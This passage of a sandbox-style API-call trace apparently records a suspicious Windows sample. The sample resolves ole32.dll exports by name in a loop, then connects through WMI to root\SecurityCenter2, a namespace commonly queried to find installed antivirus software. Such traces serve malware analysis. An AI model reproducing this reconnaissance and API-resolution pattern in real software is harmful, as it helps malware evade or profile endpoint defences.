lpString1=0xc9dc40, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0030.881] lstrlenA (lpString="COFREELIBRARY") returned 13 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0030.881] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0030.881] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0030.881] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0030.881] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0030.881] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0030.881] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0030.881] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0030.881] lstrlenA (lpString="COGETCALLERTID") returned 14 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0030.881] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0030.881] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0030.881] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0030.882] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0030.882] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0030.882] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0030.882] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0030.882] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0030.882] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0030.882] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0030.882] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0030.882] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0030.882] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0030.882] lstrlenA (lpString="COGETMALLOC") returned 11 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0030.882] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0030.882] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0030.882] lstrlenA (lpString="COGETOBJECT") returned 11 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0030.882] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0030.882] lstrlenA (lpString="COGETPSCLSID") returned 12 [0030.882] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0030.882] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0030.883] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0030.883] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0030.883] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0030.883] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0030.883] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0030.883] lstrlenA (lpString="COINITIALIZE") returned 12 [0030.883] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0030.883] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0030.883] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0030.884] lstrlenA (lpString="ole32.dll") returned 9 [0030.884] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0030.885] lstrlenA (lpString="BINDMONIKER") returned 11 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0030.885] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0030.885] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0030.885] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0030.885] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0030.885] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0030.885] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0030.885] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0030.885] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0030.885] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0030.885] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0030.885] lstrlenA (lpString="COBUILDVERSION") returned 14 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0030.885] lstrlenA (lpString="COCANCELCALL") returned 12 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0030.885] lstrlenA (lpString="COCOPYPROXY") returned 11 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0030.885] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0030.885] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0030.885] lstrlenA (lpString="COCREATEGUID") returned 12 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0030.886] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0030.886] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0030.886] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0030.886] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0030.886] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0030.886] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0030.886] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0030.886] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0030.886] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0030.886] lstrlenA (lpString="COFILETIMENOW") returned 13 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0030.886] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0030.886] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0030.886] lstrlenA (lpString="COFREELIBRARY") returned 13 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0030.886] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0030.886] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0030.886] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0030.886] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0030.886] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0030.887] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0030.887] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0030.887] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0030.887] lstrlenA (lpString="COGETCALLERTID") returned 14 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0030.887] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0030.887] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0030.887] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0030.887] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0030.887] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0030.887] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0030.887] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0030.887] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0030.887] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0030.887] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0030.887] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0030.887] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0030.887] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0030.887] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0030.887] lstrlenA (lpString="COGETMALLOC") returned 11 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0030.888] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0030.888] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0030.888] lstrlenA (lpString="COGETOBJECT") returned 11 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0030.888] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0030.888] lstrlenA (lpString="COGETPSCLSID") returned 12 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0030.888] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0030.888] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0030.888] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0030.888] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0030.888] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0030.888] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0030.888] lstrlenA (lpString="COINITIALIZE") returned 12 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0030.888] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0030.888] lstrcpyA (in: lpString1=0xc9dc24, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0030.888] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0030.888] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0030.897] lstrlenA (lpString="ole32.dll") returned 9 [0030.897] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0030.897] lstrlenA (lpString="BINDMONIKER") returned 11 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0030.897] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0030.897] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0030.897] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0030.897] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0030.897] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0030.897] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0030.897] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0030.897] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0030.897] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0030.897] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0030.898] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0030.898] lstrlenA (lpString="COBUILDVERSION") returned 14 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0030.898] lstrlenA (lpString="COCANCELCALL") returned 12 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0030.898] lstrlenA (lpString="COCOPYPROXY") returned 11 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0030.898] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0030.898] lstrlenA (lpString="COCREATEGUID") returned 12 [0030.898] lstrcpyA (in: lpString1=0xc9dc34, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0030.898] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0030.898] CoCreateInstance (in: rclsid=0xb6d74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xb6d84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1b0004 | out: ppv=0x1b0004*=0x310828) returned 0x0 [0031.335] WbemLocator:IWbemLocator:ConnectServer (in: This=0x310828, strNetworkResource="root\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1b0008 | out: ppNamespace=0x1b0008*=0x31cfe4) returned 0x0 [0035.184] lstrlenA (lpString="ole32.dll") returned 9 [0035.184] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0035.184] lstrcpyA (in: lpString1=0xc9dc28, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0035.184] lstrlenA (lpString="BINDMONIKER") returned 11 [0035.184] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0035.184] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0035.184] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0035.184] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0035.184] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLIPFORMAT_UserSize" | out: 